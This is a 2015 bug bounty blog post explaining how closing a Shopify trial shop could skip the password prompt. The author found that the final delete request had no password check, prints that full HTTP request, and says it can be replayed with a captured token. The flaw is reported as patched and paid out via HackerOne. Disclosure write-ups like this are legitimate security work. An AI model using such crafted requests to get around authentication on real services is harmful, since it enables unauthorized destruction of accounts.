Bypassing Password requirement during closing of account: Shopify Bug
Wednesday, November 04, 2015
By
Jitendra
shopify
0
comments
Hi Ck lover
Today I am sharing how I bypassed the password requirement during closing of shop which have a trial account on Shopify.
Shopify requires password for closing of shop and once you closed the shop you have to buy a existing plan to reopen it.
So if you navigate to account > close shop it will ask for a password to close it.
after entering the password it takes a survey why I closed my shop after that survey the shop is deleted.
But after submitting the survey a plain request goes without password to delete the account.
There is not validation there.
the request looks like this
POST /admin/account HTTP/1.1
Host: testingdeletion.myshopify.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://testingdeletion.myshopify.com/admin/settings/general
Cookie: <redacted>
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 216
utf8=%E2%9C%93&method=delete&authenticity_token=91xWjyZhsUKFB8k4oCTGjJxxRl25pwZNXdnNHXaYsLbj17tsg8NB%2BFnERHiG449IFxHN2vbV7L%2BUb7Cl3xxJow%3D%3D&cancelreason%5Bselection%5D=other&cancel_reason%5Bdetailed%5D=testing
You can see there is method=delete in this request but there is not validation of password here so i can grab a authenticity token by saving any of my account detail and capturing the request with burp then craft this request using you cookie and forward the request it will delete the account without any password requirement.
You can find more details here https://hackerone.com/reports/93901
This issue is now patched and they awarded my 500$ for reporting this issue
Thanks
Jitendra K Singh (Team Computer-Korner)
Feel Free To Leave A Comment If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!
0 comments: